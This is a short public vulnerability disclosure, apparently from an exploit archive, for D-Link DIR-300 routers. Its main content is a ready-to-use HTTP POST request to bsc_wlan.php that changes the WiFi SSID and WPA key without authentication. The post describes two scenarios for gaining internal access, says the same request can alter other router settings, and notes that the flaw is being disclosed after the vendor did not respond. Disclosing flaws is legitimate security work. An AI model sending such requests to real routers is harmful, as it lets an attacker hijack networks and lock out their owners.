Hello All, Here is another D-Link vulnerability where you can change the network Key (i.e., WEP, WPAx keys). Requirement: 1. You need to have access to the internal network of that router. The two scenarios are mentioned below: Scenario A: You know the network/ WIFI key to connect to the WIFI network but you may not have administration privilege to the device. Office scenario Scenario B: You are on wired LAN and the device is also on the LAN, allowing users to use the WiFi feature/ service. ===Exploit Code=== POST http://192.168.0.1/bsc_wlan.php HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml Accept-Charset: ISO-8859-1,utf-8 Keep-Alive: 115 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 320 ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk= khuljas%21ms%21m&f_radius_ip1=&f_radius_port1=&f_radius_secret1= =====End Exploit Code=== *What it does* The php file in the request allows Internal network systems, i.e., in this case 192.168.0.0/24, to change the WiFi Key without any authorization. This will also allow you to change other parameters/ configuration settings of the device. Affected Products: DIR-300 (tested) and others *Greets:* Friends: Plash, Satyam, int2root Mentor who inspired me: n2n Cheers, Gaurav Saha P.S I have sent this bug to DLink but never received any response. Hence I am disclosing the bug to the PUBLIC.